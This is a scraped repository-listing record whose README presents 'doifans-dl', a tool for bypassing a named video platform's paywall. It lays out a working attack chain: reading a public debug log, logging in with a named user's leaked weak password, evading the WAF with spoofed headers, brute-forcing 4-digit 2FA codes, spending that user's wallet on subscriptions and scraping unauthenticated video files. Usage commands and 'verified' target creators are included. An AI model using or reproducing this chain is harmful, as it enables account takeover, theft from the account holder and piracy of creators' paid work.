[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-82226":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":16,"stars90d":15,"forks30d":15,"starsTrendScore":15,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":15,"starSnapshotCount":15,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},82226,"doifans-dl","Sophomoresty\u002Fdoifans-dl","Sophomoresty","DoiFans paywall bypass video downloader",null,"Python",45,29,39,1,0,3,4.43,false,"main",true,[],"2026-06-12 02:04:24","# DoiFans-DL\r\n\r\nDoiFans paywall bypass downloader. 通过信息泄露 + WAF 绕过 + 2FA 暴力破解实现任意创作者视频免费下载.\r\n\r\n## 攻击链路\r\n\r\n```\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 1: Information Disclosure                                  │\r\n│  GET \u002Fstorage\u002Flogs\u002Flaravel.log → 30MB debug log                 │\r\n│  Contains: bcrypt hashes, user dumps, server paths              │\r\n│  Extracted: cncmeng \u002F 123123 (weak password, cracked from log)  │\r\n└──────────────────────────────────┬──────────────────────────────┘\r\n                                   ▼\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 2: WAF Bypass (nginx rule evasion)                         │\r\n│  POST \u002Flogin normally returns nginx 404 (WAF blocks)            │\r\n│  Bypass: Add Origin + Referer + Sec-Fetch-* headers             │\r\n│  Result: Login returns 200 + {\"actionRequired\": true}           │\r\n└──────────────────────────────────┬──────────────────────────────┘\r\n                                   ▼\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 3: 2FA Brute Force (4-digit email code)                    │\r\n│  Code generation: rand(1000, 9999) = 9000 possibilities         │\r\n│  Validity: 2 minutes, NO rate limiting                           │\r\n│  Speed: ~4-5 req\u002Fs serial, avg 5 attempts to hit               │\r\n│  Result: verify → auth()->loginUsingId() → full session         │\r\n└──────────────────────────────────┬──────────────────────────────┘\r\n                                   ▼\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 4: Subscribe to any creator                                │\r\n│  POST \u002Fbuy\u002Fsubscription {id, interval:monthly,                   │\r\n│                          payment_gateway:wallet}                  │\r\n│  cncmeng wallet has sufficient balance (¥20,961)                │\r\n│  Result: {\"success\": true}                                       │\r\n└──────────────────────────────────┬──────────────────────────────┘\r\n                                   ▼\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 5: Scrape video URLs                                       │\r\n│  GET \u002Fajax\u002Fupdates?id={creator_id}&skip={0,5,10,15...}          │\r\n│  Subscribed session sees full content including video URLs       │\r\n│  URLs: \u002Fpublic\u002Fuploads\u002Fupdates\u002Fvideos\u002F{creator_id}{hash}.mp4    │\r\n└──────────────────────────────────┬──────────────────────────────┘\r\n                                   ▼\r\n┌─────────────────────────────────────────────────────────────────┐\r\n│  Step 6: Download (no auth required)                             │\r\n│  Video files served by nginx with NO authentication check        │\r\n│  Direct GET request downloads the file                           │\r\n└─────────────────────────────────────────────────────────────────┘\r\n```\r\n\r\n## 漏洞根因\r\n\r\n| Step | Root Cause |\r\n|------|-----------|\r\n| Info Leak | `storage\u002Flogs\u002Flaravel.log` publicly accessible |\r\n| Weak Password | User `cncmeng` uses `123123` |\r\n| WAF Bypass | nginx rules only check path, not Sec-Fetch headers |\r\n| 2FA Brute | `rand(1000,9999)` + no rate limit + 2min expiry |\r\n| Video Access | nginx serves static files without auth middleware |\r\n\r\n## Usage\r\n\r\n```bash\r\n# Install\r\ncd doifans-dl && pip install -e .\r\n\r\n# List creator's videos\r\ndoifans-dl xingjian --list\r\n\r\n# Download all videos\r\ndoifans-dl xingjian -o .\u002Fdownloads\r\n\r\n# Check tool status\r\ndoifans-dl doctor\r\n```\r\n\r\n## Verified Creators\r\n\r\n| Username | Creator ID | Videos | Status |\r\n|----------|-----------|--------|--------|\r\n| xingjian | 45130 | 85 | ✅ Verified |\r\n| ouyangqin | 134614 | 23 | ✅ Verified |\r\n\r\n## Requirements\r\n\r\n- Python 3.10+\r\n- `requests` library\r\n- No proxy needed (direct connection works)\r\n\r\n## Technical Notes\r\n\r\n- 2FA brute force averages ~5 login attempts (each generates new code)\r\n- Serial request speed is ~4-5\u002Fs due to TLS + server latency\r\n- Each login attempt has ~115s window × 4\u002Fs = ~460 codes tested ≈ 5% hit rate per attempt\r\n- Expected attempts to succeed: ~5 (cumulative ~25% per attempt with shuffled codes)\r\n- Video files are 100% static — once URL is known, no cookies needed to download\r\n- Session must not be refreshed (GET page) between login and verify (clears session user:id)\r\n","DoiFans-DL 是一个用于绕过 DoiFans 付费墙并下载视频的工具。该项目通过信息泄露、WAF 绕过和2FA暴力破解等技术手段，实现对任意创作者视频的免费下载。其攻击链路包括获取敏感日志文件、绕过Web应用防火墙、暴力破解二次验证、订阅创作者以及抓取和下载视频URL。适合需要研究或测试DoiFans平台安全性的场景使用。请注意，此类工具可能违反服务条款，并且在未经授权的情况下使用可能会触犯法律。",2,"2026-06-11 04:08:07","CREATED_QUERY"]